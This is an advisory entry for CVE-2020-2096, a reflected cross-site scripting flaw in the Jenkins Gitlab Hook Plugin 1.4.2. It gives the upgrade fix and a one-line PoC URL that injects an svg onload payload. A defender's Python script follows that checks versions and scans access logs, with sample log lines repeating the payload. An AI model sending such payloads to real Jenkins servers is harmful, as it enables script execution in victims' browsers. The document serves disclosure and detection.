Vendor: Gitlab Hook Plugin
Author: Ai Ho
CVSS: 6.1 (MEDIUM)
Vulnerability Type: Reflected Cross-Site Scripting
CWE: 79
Product Name: Gitlab Hook Plugin
Affected Version From: 1.4.2
Affected Version To: 1.4.2
Patch Exists: YES
Related CVE: CVE-2020-2096
CPE: 2.3:a:jenkins:jenkins_gitlab_hook_plugin:1.4.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2020

Jenkins Gitlab Hook Plugin 1.4.2 – Reflected Cross-Site Scripting

Jenkins Gitlab Hook Plugin 1.4.2 and earlier is vulnerable to reflected cross-site scripting. An attacker exploits it by getting a victim to open a crafted URL: the URL carries JavaScript that the plugin reflects back unescaped, so the script runs in the victim's browser, in the context of the Jenkins instance, when the link is opened.

Mitigation:

Upgrade to version 1.4.3 or later

Exploit-DB raw data:

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E
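As an added example (not part of the Exploit-DB entry or the plugin's code), the following Python performs two defender-side checks for this advisory: a version test against the 1.4.3 upgrade target, and a scan of web-server access logs for requests to the plugin's /gitlab/ endpoint whose path contains HTML markup once percent-decoded, including double-encoded variants. The log lines are constructed; the /gitlab/ prefix is taken from the PoC URL above.

```python
import re
from urllib.parse import unquote

# Upgrade target from the mitigation above; 1.4.2 and earlier are affected.
FIXED_VERSION = (1, 4, 3)

# Constructed sample lines in Common Log Format (not real traffic). Line 2 has
# the request shape of the PoC above; line 4 is a double-encoded variant that a
# single percent-decode would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2020:10:00:01 +0000] "GET /gitlab/build_now HTTP/1.1" 200 12
10.0.0.7 - - [15/Jan/2020:10:00:02 +0000] "GET /gitlab/build_now%3Csvg/onload=alert(document.domain)%3E HTTP/1.1" 200 5120
10.0.0.9 - - [15/Jan/2020:10:00:03 +0000] "GET /job/demo/ HTTP/1.1" 200 3301
10.0.0.7 - - [15/Jan/2020:10:00:04 +0000] "GET /gitlab/build_now%253Cimg%2520src=x%253E HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"'
)
HOOK_PREFIX = "/gitlab/"  # endpoint prefix from the PoC URL on this page


def parse_version(text: str) -> tuple:
    """Turn '1.4.2' (or '1.4.3-beta') into a tuple of leading integers."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_fixed_version(version: str) -> bool:
    """True if the installed plugin version is 1.4.3 or later."""
    return parse_version(version) >= FIXED_VERSION


def decode_fully(path: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded markup is also caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def flag_suspicious_hook_requests(log_text: str) -> list:
    """Return (client_ip, decoded_path) for /gitlab/ requests whose path
    carries HTML markup characters, i.e. candidate reflected-XSS attempts."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        decoded = decode_fully(m.group("path"))
        if decoded.startswith(HOOK_PREFIX) and re.search(r"[<>]", decoded):
            hits.append((m.group("ip"), decoded))
    return hits
```

Run `flag_suspicious_hook_requests(SAMPLE_LOG)` against real access logs by reading the file contents in place of `SAMPLE_LOG`; a hit on an instance still running 1.4.2 warrants checking that the upgrade is applied.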